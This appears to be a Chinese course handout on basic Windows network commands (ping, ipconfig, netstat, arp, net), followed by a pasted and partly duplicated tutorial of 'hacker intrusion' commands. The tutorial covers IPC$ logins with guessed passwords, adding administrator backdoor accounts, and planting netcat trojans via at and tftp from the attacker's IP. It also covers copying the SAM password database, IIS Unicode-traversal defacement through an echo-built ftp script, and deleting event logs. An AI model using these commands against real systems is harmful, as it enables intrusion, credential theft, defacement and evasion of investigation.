实验一 常用网络命令

实验目的：

1、了解或掌握一些网络常用命令 

2、掌握Ping、netstat、IPConfig、ARP等命令的功能及一般用法 

3、能应用上述命令进行网络连通、网络状态、网络配置等查看问

实验要求：

1、利用Ping对某个已知IP或域名的计算机进行连通查询，对查询结果进行分析并做好记录 

2、利用netstat对本机的网络状态进行查询，对查询结果进行分析并做好记录 

3、利用IPConfig对本机的网络状态进行查询，对查询结果进行分析并做好记录

要求每位同学熟练使用如下命令，掌握相关参数

以下命令均在DOS（即CMD）下运行

常用命令：

1.ping 命令（最基本，最常用的，测试物理网络的连通性） 

学会使用其基本参数

 　　ping是用来检查网络是否通畅或者网络连接速度的命令。Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据报。根据返回的信息，你就可以推断TCP/IP参数是否设置得正确以及运行是否正常。如果Ping运行正确，大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障。  按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，你应能得到4个回送应答。 

  Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。

通过Ping检测网络故障的典型次序 

  正常情况下，当你使用Ping命令来查找问题所在或检验网络运行情况时，你需要使用许多Ping命令，如果所有都运行正确，你就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障： 

1. ping 127.0.0.1——这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。 

2. ping 本机IP——这个命令被送到你计算机所配置的IP地址，你的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。 

3. ping 局域网内其他IP——这个命令应该离开你的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。 

4. ping 网关IP——这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。 

5. ping 远程IP——如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。 

6. ping localhost——localhost是个作系统的网络保留名，它是127.0.0.1的别名，每台计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。 

7. ping （具体某个URL）如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：你也可以利用该命令实现域名对IP地址的转换功能。 

  如果上面所列出的所有Ping命令都能正常运行，那么你对你的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示你所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。 

Ping命令的常用参数选项 

ping IP -t——连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。 

ping IP -l 2000——指定Ping命令中的数据长度为2000字节，而不是缺省的32字节。 

ping IP -n——执行特定次数的Ping命令。 

　　-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，一次攻击就这么简单的实现了。 　　 

　　-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。 　　 

　　-n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次。 　　 

　　说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如“ping IP -t -n 3”，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的IP。 　　 　 

2.ipconfig(查看DNS、IP地址、Mac地址等 )

IPConfig 

  IPConfig实用程序可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果你的计算机和所在的局域网使用了动态主机配置协议（Dynamic Host Configuration Protocol，DHCP——Windows NT下的一种把较少的IP地址分配给较多主机使用的协议，类似于拨号上网的动态IP分配），这个程序所显示的信息也许更加实用。这时，IPConfig可以让你了解你的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。 

最常用的选项： 

ipconfig——当使用IPConfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值 

ipconfig /all——当使用all选项时，IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期

ipconfig /release和ipconfig /renew——这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果你输入ipconfig /release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果你输入ipconfig /renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址。请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。  

3.netstat (查看网络状态)

Netstat 

  Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用于检验本机各端口的网络连接情况。  

Netstat的一些常用选项： 

netstat -s——本选项能够按照各个协议分别显示其统计数据。如果你的应用程序（如Web浏览器）运行速度比较慢，或者不能显示Web页之类的数据，那么你就可以用本选项来查看一下所显示的信息。你需要仔细查看统计数据的各行，找到出错的关键字，进而确定问题所在。 

netstat -e——本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量，也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量）。 

netstat -r——本选项可以显示关于路由表的信息，类似于后面所讲使用route print命令时看到的 信息。除了显示有效路由外，还显示当前有效的连接。 

netstat -a——本选项显示一个所有的有效连接信息列表，包括已建立的连接（ESTABLISHED），也包括监听连接请求（LISTENING）的那些连接。 

netstat -n——显示所有已建立的有效连接。  

4.tracert  (路由跟踪命令)

Tracert （需连上互联网）

  当数据报从你的计算机经过多个网关传送到目的地时，Tracert命令可以用来跟踪数据报使用的路由（路径）。该实用程序跟踪的路径是源计算机到目的地的一条路径，不能保证或认为数据报总遵循这个路径。Tracert是一个运行得比较慢的命令（如果你指定的目标地址比较远），每个路由器你大约需要给它15秒钟 

  Tracert的使用很简单，只需要在tracert后面跟一个IP地址或URL，Tracert会进行相应的域名转换的。Tracert一般用来检测故障的位置，你可以用tracert IP在哪个环节上出了问题，虽然还是没有确定是什么问题，但它已经告诉了我们问题所在的地方，你也就可以很有把握的告诉别人——某某出了问题。 

如：tracert www.sina.com.cn

或：tracert 192.168.5.1

5.arp（IP地址和MAC地址对应命令）

ARP（地址转换协议） 

  ARP是一个重要的TCP/IP协议，并且用于确定对应IP地址的网卡物理地址。使用arp命令，可以用人工方式输入静态的网卡物理/IP地址对。 

  按照缺省设置，ARP高速缓存中的项目是动态的，每当发送一个指定地点的数据报且高速缓存中不存在当前项目时，ARP便会自动添加该项目。如果ARP高速缓存中项目很少或根本没有时，请不要奇怪，通过另一台计算机或路由器的ping命令即可添加。所以，需要通过arp命令查看高速缓存中的内容时，请最好先ping 此台计算机（不能是本机发送ping命令）。 

常用命令选项： 

arp -a或arp -g——用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的，多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项，而Windows用的是arp -a（-a可被视为all，即全部的意思），但它也可以接受比较传统的-g选项。 

arp -a IP——如果你有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目。 

arp -s IP 物理地址——你可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态，或者在出现错误时，人工配置的物理地址将自动更新该项目。 

arp -d IP——使用本命令能够人工删除一个静态项目。

6.net（网络查看及配置）

　这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是太强大了。首先让我们来看一看它都有那些子命令，键入net /? 

　　在这里，我们重点掌握几个常用的子命令。 　　 

　　net view 　　 

　　使用此命令查看远程主机的所以共享资源。命令格式为net view \\\\IP。　　  

　　net user 

查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。键入不带参数的net user，可以查看所有用户，包括已经禁用的。

下面分别讲解。 

　　1. net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。 

　　2. net user abcd /del，将用户名为abcd的用户删除。 

　　3. net user abcd /active:no，将用户名为abcd的用户禁用。 

　　4. net user abcd /active:yes，激活用户名为abcd的用户。 

　　5. net user abcd，查看用户名为abcd的用户的情况　　 

　　net localgroup 

　　查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐户就可以控制整个远程主机了。用法：net localgroup groupname username /add 　　 　　 

　　net time 

这个命令可以查看远程主机当前的时间。用法：net time \\\\IP。 

比如：查看这个IP上的共享资源，就可以 

C:\\>net view 192.168.10.8 

在 192.168.10.8 的共享资源 

资源共享名 类型 用途 注释 

-------------------------------------- 

网站服务 Disk 

命令成功完成。 

网络信使    

　　Net send 计算机名/IP|* (广播) 传送内容，注意不能跨网段    

　　net stop messenger 停止信使服务，也可以在面板－服务修改    

　　net start messenger 开始信使服务 

在网络邻居上隐藏你的计算机    

　　net config server /hidden:yes    

　　net config server /hidden:no 则为开启   

显示联网计算机列表

　　显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。    

　　比如：查看这个IP上的共享资源，就可以    

　　C:>net view 192.168.10.8    

　　在 192.168.10.8 的共享资源    

　　资源共享名 类型 用途 注释   

7.关于共享安全的几个命令 

A.查看你机器的共享资源 net share 

B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！） 

net share c$ /d 

net share d$ /d 

net share ipc$ /d 

net share admin$ /d 

注意$后有空格。 

C.增加一个共享： 

c:\\net share mymovie=e:\\downloads\\movie /users:1 

mymovie 共享成功。 

同时链接用户数为1人。 

做完后需完成以下表格

截取部分相关结果图片

例：

                          （感兴趣的可以学学）

黑客入侵中常用的命令：

*net user 查看用户列表

*net user 用户名 密码 /add 添加用户

*net user 用户名 密码 更改用户密码

*net localgroup administrators 用户名 /add 添加用户到管理组

*net user 用户名 /delete 删除用户

*net user 用户名 查看用户的基本情况

*net user 用户名 /active:no 禁用该用户

*net user 用户名 /active:yes 启用该用户

*net share 查看计算机ipc$共享资源

*net share 共享名 查看该共享的情况

*net share 共享名=路径 设置共享。例如 net share c$=c:

*net share 共享名 /delete 删除ipc$共享

*net use 查看ipc$连接情况

*net use \\\\ip\\ipc$ "密码" /user:"用户名" ipc$连接

*net time \\\\ip 查看远程计算机上的时间

*copy 路径:\文件名 \\\\ip\共享名 复制文件到已经ipc$连接的计算机上

*net view ip 查看计算机上的共享资源

*ftp 服务器地址 进入ftp服务器

*at 查看自己计算机上的计划作业

*at \\\\ip 查看远程计算机上的计划作业

*at \\\\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

*at \\\\ip 计划作业id /delete 删除远程计算机上的一个计划作业

*at \\\\ip all /delete 删除远程计算机上的全部计划作业

1.Net常用命令: 

(1)net share - 查看共享命令 

net share ipc$ - 设置ipc$共享 

net share ipc$ /del - 删除ipc$共享 (xp系统无法删除) 

net share c$=c: - 设置c盘为共享 

(2)net user - 查看本地的用户列表 

net user 用户名 密码 /add - 增加一个用户 

net user 用户名 /add 或 net user 用户名 "" /add - 增加一个密码为空的用户 

net user 用户名 /del - 删除某个用户名 

net user 用户名 /active:yes(no) - 设置某个用户的状态为启用(禁用) 

(3)net localgroup administrators - 查看管理员组里的用户(即权限为管理员的用户) 

net localgroup administrators 用户名 /add - 把某个用户增加到管理员组里 

net localgroup administrators 用户名 /del - 从管理员组里删除某个用户 

注意:1.增加到某个组里的用户必须是已经被创建过的用户. 

2.增加到的组必须为存在的组. 

(4)net start - 查看已经启动的服务列表 

net start 服务名 - 开启某个服务 注意:要想成功的开启一个服务,前提是它被停用了,而不是被禁止 

net stop 服务名 - 停止某个服务 注意:停止的服务必须是已经启动的,而不是已经停止或是被禁止的 

(5)net use \\\\ip地址\\ipc$ "密码" /user:用户名 - 和某个ip地址建立一个ipc$连接(ipc$入侵) 

net use \\\\ip地址\\ipc$ /del - 删除建立的ipc$连接 

命令成功与否的前提:1.对方操作系统是否为NT以上的(除xp外) 

2.对方系统是否开启了ipc$共享 

3.输入的用户名和密码是否正确 

(6)net use h: \\\\ip地址\\c$ - 将对方c盘映射到本地的h盘 

net use h: /del -删除映射到本地的磁盘 

注意:1.要映射到本地的磁盘名不能与本地现有的磁盘名重复(冲突) 

2.想要映射对方的某个磁盘或目录的前提是对方的此磁盘或目录设置了共享 

2.copy 磁盘:\程序名 \\\\ip地址\\c$\要保存的程序名 

3.net time \\\\ip地址 - 查看某ip地址的计算机系统上的时间 

注意:除了查看本机时间可直接输入此命令外,在查看其他ip地址的时间之前必须建立ipc$连接 

4.at \\\\ip地址 时间 要运行的程序 - 指定远程计算机在某个时间点运行指定的程序 

5.telnet ip地址 端口号(默认23) - 登陆远程计算机的telnet终端需要用到的软件：后门软件Winshell

 1.Net常用命令:

(1)net share - 查看共享命令

   net share ipc$ - 设置ipc$共享 

   net share ipc$ /del - 删除ipc$共享 (xp系统无法删除)

   net share c$=c: - 设置c盘为共享

(2)net user - 查看本地的用户列表

   net user 用户名 密码 /add - 增加一个用户

   net user 用户名 /add 或 net user 用户名 "" /add - 增加一个密码为空的用户

   net user 用户名 /del - 删除某个用户名

   net user 用户名 /active:yes(no) - 设置某个用户的状态为启用(禁用)

(3)net localgroup administrators - 查看管理员组里的用户(即权限为管理员的用户)

   net localgroup administrators 用户名 /add - 把某个用户增加到管理员组里

   net localgroup administrators 用户名 /del - 从管理员组里删除某个用户

   注意:1.增加到某个组里的用户必须是已经被创建过的用户.

        2.增加到的组必须为存在的组.

(4)net start - 查看已经启动的服务列表

   net start 服务名 - 开启某个服务   注意:要想成功的开启一个服务,前提是它被停用了,而不是被禁止

   net stop 服务名  - 停止某个服务   注意:停止的服务必须是已经启动的,而不是已经停止或是被禁止的

(5)net use \\\\ip地址\\ipc$ "密码" /user:用户名 - 和某个ip地址建立一个ipc$连接(ipc$入侵)

   net use \\\\ip地址\\ipc$ /del - 删除建立的ipc$连接

   命令成功与否的前提:1.对方操作系统是否为NT以上的(除xp外)

                      2.对方系统是否开启了ipc$共享

                      3.输入的用户名和密码是否正确

(6)net use h: \\\\ip地址\\c$ - 将对方c盘映射到本地的h盘

   net use h: /del -删除映射到本地的磁盘

   注意:1.要映射到本地的磁盘名不能与本地现有的磁盘名重复(冲突)

        2.想要映射对方的某个磁盘或目录的前提是对方的此磁盘或目录设置了共享

      2.copy 磁盘:\程序名 \\\\ip地址\\c$\要保存的程序名

      3.net time \\\\ip地址 - 查看某ip地址的计算机系统上的时间

       注意:除了查看本机时间可直接输入此命令外,在查看其他ip地址的时间之前必须建立ipc$连接

      4.at \\\\ip地址 时间 要运行的程序 - 指定远程计算机在某个时间点运行指定的程序

      5.telnet ip地址 端口号(默认23) - 登陆远程计算机的telnet终端 

win2003系统下新增命令（实用部份）： 

shutdown /参数 关闭或重启本地或远程主机。

参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。

例：shutdown /r /t 0 立即重启本地主机（无延时） 

一般黑客入侵所需要的几个常用命令

1：NET 

只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！ 

这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1 

net use \\\\127.0.0.1\\ipc$ "123456" /user:"hbx" 

退出的命令是 

net use \\\\127.0.0.1\\ipc$ /delte 

下面的操作你必须登陆后才可以用.登陆的方法就在上面. 

---------------------- 

下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户. 

我们加一个heibai的用户密码为lovechina 

net user heibai lovechina /add 

只要显示命令成功,那么我们可以把他加入Administrator组了. 

net localgroup Administrators heibai /add 

---------------------- 

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. 

net use z:\\\\127.0.0.1\\c$ 

---------------------- 

net start telnet 

这样可以打开对方的TELNET服务. 

---------------------- 

这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。 

net user guest /active:yes 

---------------------- 

这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！ 

net user guest lovechina 

net命令果然强大啊！ 

2:at 

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？ 

那么需要用AT命令，这里假设你已经登陆了那个服务器。 

你首先要得到对方的时间， 

net time \\\\127.0.0.1 

将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其ID=1 

at \\\\127.0.0.1 12:3 nc.exe 

这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上. 

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 

3:telnet 

这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. 

telnet 127.0.0.1 99 

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 

4:FTP 

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后，它会给用户名,密码,以及FTP服务器. 

在上传前需要登陆先，这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321 

ftp www.51.net 

他会要求输入用户,成功后会要求输入密码. 

---------------------- 

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\\ 

get c:\\index.htm d:\\ 

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 

put c:\\index.htm d:\\ 

5:copy 

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好IPC$连接才有效。 

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 

copy index.htm \\\\127.0.0.1\\c$\\index.htm 

---------------------- 

如果你要复制到D盘下把C改为D，就行了！ 

copy index.htm \\\\127.0.0.1\\d$\\index.htm 

---------------------- 

如果你要把他复制到WINNT目录里 

就要把输入 

copy index.htm \\\\127.0.0.1\\admin$\\index.htm 

admin$是winnt 

---------------------- 

要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在x:\\winnt\\repair\\sam._ sam._是数据库的文件名 

下面就把127.0.0.1的数据库复制到本地C盘下 

copy \\\\127.0.0.1\\admin$\\repair\\sam._ c:\\ 

---------------------- 

6：set 

如果你跑进了一部机子，而且想黑他（这思想只能在特别时候才准有），当然他的80端口要开，不然你黑给谁看。这时需要用SET命令！ 

下面是我得到的结果！我来分析它，只是找主页在那而已。 

COMPUTERNAME=PENTIUMII 

ComSpec=D:\\WINNT\\system32\\cmd.exe 

CONTENT_LENGTH=0 

GATEWAY_INTERFACE=CGI/1.1 

HTTP_ACCEPT=*/* 

HTTP_ACCEPT_LANGUAGE=zh-cn 

HTTP_CONNECTION=Keep-Alive 

HTTP_HOST=当前登陆者的IP，这里本来是显示我的IP，被我删除了 

HTTP_ACCEPT_ENCODING=gzip, deflate 

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) 

NUMBER_OF_PROCESSORS=1 

Os2LibPath=D:\\WINNT\\system32\\os2\\dll; 

OS=Windows_NT 

Path=D:\\WINNT\\system32;D:\\WINNT 

PATHEXT=.COM;.EXE;.BAT;.CMD 

PATH_TRANSLATED=E:\\vlroot主页放在的地址，只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\\vlroot 

PROCESSOR_ARCHITECTURE=x86 

PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel 

PROCESSOR_LEVEL=6 

PROCESSOR_REVISION=0303 

PROMPT=$P$G 

QUERY_STRING=/c+set 

REMOTE_ADDR=XX.XX.XX.XX 

REMOTE_HOST=XX.XX.XX.XX 

REQUEST_METHOD=GET 

SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe 

SERVER_NAME=XX.XX.XX.XX 

SERVER_PORT=80 

SERVER_PORT_SECURE=0 

SERVER_PROTOCOL=HTTP/1.1 

SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 

SystemDrive=D: 

SystemRoot=D:\\WINNT 

TZ=GMT-9 

USERPROFILE=D:\\WINNT\\Profiles\\Default User 

windir=D:\\WINNT 

粉红色的那行就是对方主页存放地址，这里告诉大家一个技巧，很笨的技巧啊，不过只能用这个方法才能100%的找到主页的名称，当你DIR这个目录时，一定会看到很多文件，你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名，这样只要看到和XX.XX.XX.XX看到的也面一模一样，那么这就是主页的名称了。 

7：nbtstat 

如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都试下，不行就暴力破解吧！ 

现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分析得到的结果。 

命令是 

nbtstat -A XX.XX.XX.XX 

-A一定要大写哦。 

下面是得到的结果。 

NetBIOS Remote Machine Name Table 

Name Type Status 

--------------------------------------------- 

Registered Registered Registered Registered Registered Registered Registered Reg 

istered Registered Registered Registered 

MAC Address = 00-E0-29-14-35-BA 

PENTIUMII <00> UNIQUE

PENTIUMII <20> UNIQUE

orAHOTOWN <00> GROUP

orAHOTOWN <1C> GROUP 

orAHOTOWN <1B> UNIQUE

PENTIUMII <03> UNIQUE

INet~Services <1C> GROUP 

IS~PENTIUMII...<00> UNIQUE

orAHOTOWN <1E> GROUP

orAHOTOWN <1D> UNIQUE

..__MSBROWSE__.<01> GROUP

粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用户。 

这里的用户是PENTIUMII。 

8：Shutdown 

关了对方的NT服务器的命令 

Shutdown \\\\IP地址 t:20 

20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大的损失，要做个有良心的入侵者呀。 

9：DIR 

这个命令没什么好讲，但是却非常重要，他是查看一目录里的所有文件、文件夹。 

你可以本地试下。 

10：echo 

著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主机。 

我们假设我们要把“南京大铁证如山，任何日本人不得抵赖！”写入index.htm，有2种方法，大家看看有什么区别。 

echo 南京大铁证如山，任何日本人不得抵赖！>index.htm 

echo 南京大铁证如山，任何日本人不得抵赖！>>index.htm 

第一个的意思是覆盖index.htm原有的内容，把“南京大铁证如山，任何日本人不得抵赖！”写进index.htm。 

第二个的意思是把“南京大铁证如山，任何日本人不得抵赖！”加到index.htm里面。 

“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。 

大家可以本地试下。 

可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页到对方的目录里。 

1、首先，我们需要申请一个免费的主页空间。 

2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器为例。） 

open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商会给你的） 

cnhack（你申请时的用户名） 

test（你申请时的密码） 

get index.htm c:\\inetpub\\wwwroot\\index.htm（这里是把你空间上的index.htm下载到对方的c:\\inetpub\\wwwroot\\index.htm） 

bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS） 

具体的做法： 

输入 echo open upload.chinaren.com> c:\\cnhack.txt 

输入 echo cnhack >> c:\\cnhack.txt 

输入 echo 39abs >> c:\\cnhack.txt 

输入 echo get index.htm c:\\inetpub\\wwwroot\\index.htm+>>+c:\\cnhack.txt 

最后输入 ftp -s:c:\\cnhack.txt （利用ftp的-s参数，执行文件里的内容。） 

等命令完成时，文件已经下载到你指定的文件里了。 

注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给别人看到你的密码。） 

记得要 del c:\\cnhack.txt 

11:attrib 

这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不行。倒！不过有这个命令就别怕了。 

attrib -r index.htm 

这个命令是把index.htm的只读属性去掉。 

如果把“-”改为“+”则是把这个文件的属性设置为只读 

---------------------- 

attrib +r index.htm 

这个命令是把index.htm的属性设置为只读。 

12:del 

当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日志，当然要删除日志啦！想被捉吗。呵呵。 

NT的日志有这些 

del C:\\winnt\\system32\\logfiles\\*.* 

del C:\\winnt\\ssytem32\\config\\*.evt 

del C:\\winnt\\system32\\dtclog\\*.* 

del C:\\winnt\\system32\\*.log 

del C:\\winnt\\system32\\*.txt 

del C:\\winnt\\*.txt 

del C:\\winnt\\*.log 

只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改成其他盘。

建立一个空连接

命令：net use \\\\192.168.0.198\\ipc$ "" /user:"administrator"

查看远程主机的共享资源

命令：net view \\\\ip

查看远程主机的当前时间

命令： net time \\\\ip

得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）

命令：nbtstat -A ip

删除连接:

net use \\\\127.0.0.1\\ipc$ /del

映射/删除远程共享:

net use z: \\\\127.0.0.1\\c

向远程主机复制文件:

copy 路径\文件名 \\\\IP\共享目录名，如：

copy d:\\33.exe \\\\IP\\c$ 即将d盘下的33.exe复制到对方c盘内

把远程主机上的文件复制到自己的机器里：

copy \\\\127.0.0.1\\c$\\xinxin.exe c:\

远程添加计划任务:

at \\\\IP 时间 程序名 如：

at \\\\IP 11:00 33.exe

1）查看本地主机的共享资源（可以看到本地的默认共享）

net share

2）得到本地主机的用户列表

net user

3）显示本地某用户的帐户信息

net user 帐户名

4）显示本地主机当前启动的服务

net start 

5）启动/关闭本地服务

net start 服务名 

net stop 服务名 

6）在本地添加帐户

net user 帐户名 密码 /add

7）激活禁用的用户

net uesr 帐户名 /active:yes

8）加入管理员组

net localgroup administrators xuliguo /add 

tftp -i 你的IP get **.exe c:\\winnt\\system32\\**.exe

m溢出的对方SHELL后在DOS下上传木马

tftp -i 自已的IP get ***.exe

time

at \\\对方的IP 时间 ***.exe 

windows xp 远程关机2007-03-28 14:31用法: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\\\computername] [-t xx] [-c "co 

mment"] [-d up:xx:yy] 

没有参数 显示此消息(与 ? 相同) 

-i 显示 GUI 界面，必须是第一个选项 

-l 注销(不能与选项 -m 一起使用) 

-s 关闭此计算机 

-r 关闭并重启动此计算机 

-a 放弃系统关机 

-m \\\\computername 远程计算机关机/重启动/放弃 

-t xx 设置关闭的超时为 xx 秒 

-c "comment" 关闭注释(最大 127 个字符) 

-f 强制运行的应用程序关闭而没有警告 

-d [u][p]:xx:yy 关闭原因代码 

u 是用户代码 

p 是一个计划的关闭代码 

xx 是一个主要原因代码(小于 256 的正整数) 

yy 是一个次要原因代码(小于 65536 的正整数) 

首先 你要保证你有管理员的权限访问 \\\\IP 访问你要远程关闭的电脑 

然后你就可以用以上的关闭远程电脑的参数即可。 

你自己的电脑不需要什么服务。但是远程的电脑里必须能执行shutdown这个命令。 

其实Windows本身也带有这样一个关机“木马”。如果对WindowsXP有所了解的人 ，应该知道XP中新增了一个Shutdown命令。用“ -m\\\\p地址”参数就能实现远程关机。不过也别急着害怕，前提是必须拥有远程计算机的管理权限。 

以远程IP为192.168.0.2为例，运行CMD打开“命令提示符”窗口，在其中输入 

shutdown -s -m\\\\192.168.0.2 -t0 -f"(f参数表示强行关机） 

回车，对方就关机了。如果不成功则说明你没有获得该计算机的管理权限。 

以用户名为 “admin" 密码为 “password "为例，可以通过执行 

net use \\\\192.168.0.2\\ipc$ "passwotd "/usetr:admin " 

命令获得远程IPC管理权限，再执行Shutdown命令就能轻松远程关机了。将多条关机命令保存在BAT批处理文件中还能实现批量关机。 

附: 

笔者所在公寓组建了一个小型网，由其中一间屋子的一台电脑当主机实行ADSL共享上网。但每到晚上，由于大家就寝时间不一致，所以主机必须等到大家都不用网络了才能关机，带来非常大的麻烦，于是就想了个办法实行远程关机。 

在Windows XP默认的安全策略中，只有管理员组的用户才有权从远端关闭计算机，而一般情况下我们从其它电脑来访问该计算机时，则只有Guest用户权限，所以当我们执行shutdown命令时，便会出现“拒绝访问”的情况。所以，只要在客户计算机（能够被远程关闭的计算机）中赋予Guest用户远程关机的权限即可。这可利用Windows XP的“组策略”或“管理工具”中的“本地安全策略”来实现。下面以“组策略”为例进行介绍。 

1.单击“开始”按钮，选择“运行”，在对话框中输入“gpedit.msc”，然后单击“确定”，打开“组策略编辑器”。 

2.在“组策略”窗口的左边打开“计算机配置→Windows设置→安全设置→本地策略→用户权利指派”。 

